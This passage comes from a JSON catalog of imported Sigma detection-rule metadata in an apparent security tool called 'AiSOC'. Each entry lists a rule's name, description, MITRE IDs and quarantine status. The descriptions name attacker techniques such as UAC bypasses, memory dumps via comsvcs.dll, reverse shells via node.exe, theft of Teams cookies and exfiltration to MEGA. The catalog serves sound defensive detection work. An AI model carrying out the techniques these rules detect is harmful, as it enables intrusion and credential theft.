"provenance": { "source": "SigmaHQ/sigma", "source_id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" } }, { "id": "sigmahq-sigma-63c779ba-f638-40a0-a593-ddd45e8b1ddc", "type": "detection", "name": "EventLog EVTX File Deleted", "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/eventlog-evtx-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml" } }, { "id": "sigmahq-sigma-63d1ccc0-2a43-4f4b-9289-361b308991ff", "type": "detection", "name": "Wab/Wabmig Unusual Parent Or Child Processes", "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wab-wabmig-unusual-parent-or-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" } }, { "id": "sigmahq-sigma-63de06b9-a385-40b5-8b32-73f2b9ef84b6", "type": "detection", "name": "Fsutil Drive Enumeration", "description": "Attackers may leverage fsutil to enumerated connected drives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1120" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fsutil-drive-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" } }, { "id": "sigmahq-sigma-63e3365d-4824-42d8-8b82-e56810fefa0c", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - System", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63e3365d-4824-42d8-8b82-e56810fefa0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml" } }, { "id": "sigmahq-sigma-63e4f530-65dc-49cc-8f80-ccfa95c69d43", "type": "detection", "name": "UAC Bypass Using EventVwr", "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-eventvwr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" } }, { "id": "sigmahq-sigma-6414b5cd-b19d-447e-bb5e-9f03940b5784", "type": "detection", "name": "Potential DLL Sideloading Of DBGHELP.DLL", "description": "Detects potential DLL sideloading of \"dbghelp.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbghelp-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbghelp.yml" } }, { "id": "sigmahq-sigma-6419afd1-3742-47a5-a7e6-b50386cd15f8", "type": "detection", "name": "Chmod Targeting Sensitive Directories", "description": "Detects chmod targeting files in sensitive directory paths on Linux systems.\nAttackers may use chmod to change permissions of files in these directories to maintain persistence, escalate privileges, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chmod-targeting-sensitive-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chmod_targeting_sensitive_directories.yml" } }, { "id": "sigmahq-sigma-641a4bfb-c017-44f7-800c-2aee0184ce9b", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - System", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml" } }, { "id": "sigmahq-sigma-643bdcac-8b82-49f4-9fd9-25a90b929f3b", "type": "detection", "name": "Renamed MegaSync Execution", "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-megasync-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" } }, { "id": "sigmahq-sigma-645fd80d-6c07-435b-9e06-7bc1b5656cba", "type": "detection", "name": "Roles Activated Too Frequently", "description": "Identifies when the same privilege role has multiple activations by the same user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-activated-too-frequently.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "645fd80d-6c07-435b-9e06-7bc1b5656cba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml" } }, { "id": "sigmahq-sigma-646bc99f-6682-4b47-a73a-17b1b64c9d34", "type": "detection", "name": "Execute Files with Msdeploy.exe", "description": "Detects file execution using the msdeploy.exe lolbin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-files-with-msdeploy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" } }, { "id": "sigmahq-sigma-646ea171-dded-4578-8a4d-65e9822892e3", "type": "detection", "name": "Process Memory Dump Via Comsvcs.DLL", "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "646ea171-dded-4578-8a4d-65e9822892e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" } }, { "id": "sigmahq-sigma-64760eef-87f7-4ed3-93fd-655668ea9420", "type": "detection", "name": "Use of Scriptrunner.exe", "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-scriptrunner-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64760eef-87f7-4ed3-93fd-655668ea9420", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" } }, { "id": "sigmahq-sigma-647c7b9e-d784-4fda-b9a0-45c565a7b729", "type": "detection", "name": "Operator Bloopers Cobalt Strike Commands", "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/operator-bloopers-cobalt-strike-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" } }, { "id": "sigmahq-sigma-64d51a51-32a6-49f0-9f3d-17e34d640272", "type": "detection", "name": "Ngrok Usage with Remote Desktop Service", "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ngrok-usage-with-remote-desktop-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" } }, { "id": "sigmahq-sigma-64e8e417-c19a-475a-8d19-98ea705394cc", "type": "detection", "name": "Alternate PowerShell Hosts - PowerShell Module", "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/alternate-powershell-hosts-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64e8e417-c19a-475a-8d19-98ea705394cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" } }, { "id": "sigmahq-sigma-651f87f7-12db-47f9-84c5-f27b081b94b6", "type": "detection", "name": "RegAsm.EXE Execution Without CommandLine Flags or Files", "description": "Detects the execution of \"RegAsm.exe\" without a commandline flag or file, which might indicate potential process injection activity.\nUsually \"RegAsm.exe\" should point to a dedicated DLL file or call the help with the \"/?\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regasm-exe-execution-without-commandline-flags-or-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "651f87f7-12db-47f9-84c5-f27b081b94b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_no_flag_or_dll_execution.yml" } }, { "id": "sigmahq-sigma-65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "type": "detection", "name": "EVTX Created In Uncommon Location", "description": "Detects the creation of new files with the \".evtx\" extension in non-common or non-standard location.\nThis could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.\nNote that backup software and legitimate administrator might perform similar actions during troubleshooting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/evtx-created-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" } }, { "id": "sigmahq-sigma-652c098d-dc11-4ba6-8566-c20e89042f2b", "type": "detection", "name": "User Added To Admin Group Via Sysadminctl", "description": "Detects attempts to create and add an account to the admin group via \"sysadminctl\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-sysadminctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "652c098d-dc11-4ba6-8566-c20e89042f2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" } }, { "id": "sigmahq-sigma-65354b83-a2ea-4ea6-8414-3ab38be0d409", "type": "detection", "name": "Cross Site Scripting Strings", "description": "Detects XSS attempts injected via GET requests in access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1189" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cross-site-scripting-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_xss_in_access_logs.yml" } }, { "id": "sigmahq-sigma-654fcc6d-840d-4844-9b07-2c3300e54a26", "type": "detection", "name": "Legitimate Application Dropped Archive", "description": "Detects programs on a Windows system that should not write an archive to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-dropped-archive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml" } }, { "id": "sigmahq-sigma-6555754e-5e7f-4a67-ad1c-4041c413a007", "type": "detection", "name": "Anomalous Token", "description": "Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anomalous-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6555754e-5e7f-4a67-ad1c-4041c413a007", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" } }, { "id": "sigmahq-sigma-65744385-8541-44a6-8630-ffc824d7d4cc", "type": "detection", "name": "Microsoft Teams Sensitive File Access By Uncommon Applications", "description": "Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-teams-sensitive-file-access-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65744385-8541-44a6-8630-ffc824d7d4cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml" } }, { "id": "sigmahq-sigma-6597be7b-ac61-4ac8-bef4-d3ec88174853", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - Registry", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-65c3ca2c-525f-4ced-968e-246a713d164f", "type": "detection", "name": "Visual Studio NodejsTools PressAnyKey Renamed Execution", "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-nodejstools-pressanykey-renamed-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65c3ca2c-525f-4ced-968e-246a713d164f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml" } }, { "id": "sigmahq-sigma-65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "type": "detection", "name": "Potential Persistence Via PlistBuddy", "description": "Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.001", "T1543.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-plistbuddy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" } }, { "id": "sigmahq-sigma-65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "type": "detection", "name": "SharpHound Recon Account Discovery", "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sharphound-recon-account-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" } }, { "id": "sigmahq-sigma-6640f31c-01ad-49b5-beb5-83498a5cd8bd", "type": "detection", "name": "Potential Arbitrary Code Execution Via Node.EXE", "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-code-execution-via-node-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_node_abuse.yml" } }, { "id": "sigmahq-sigma-66474410-b883-415f-9f8d-75345a0a66a6", "type": "detection", "name": "DNS Query To MEGA Hosting Website - DNS Client", "description": "Detects DNS queries for subdomains related to MEGA sharing website", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-mega-hosting-website-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66474410-b883-415f-9f8d-75345a0a66a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml" } }, { "id": "sigmahq-sigma-665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "type": "detection", "name": "User Removed From Group With CA Policy Modification Access", "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-removed-from-group-with-ca-policy-modification-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml" } }, { "id": "sigmahq-sigma-66a4d409-451b-4151-94f4-a55d559c49b0", "type": "detection", "name": "PowerShell Deleted Mounted Share", "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 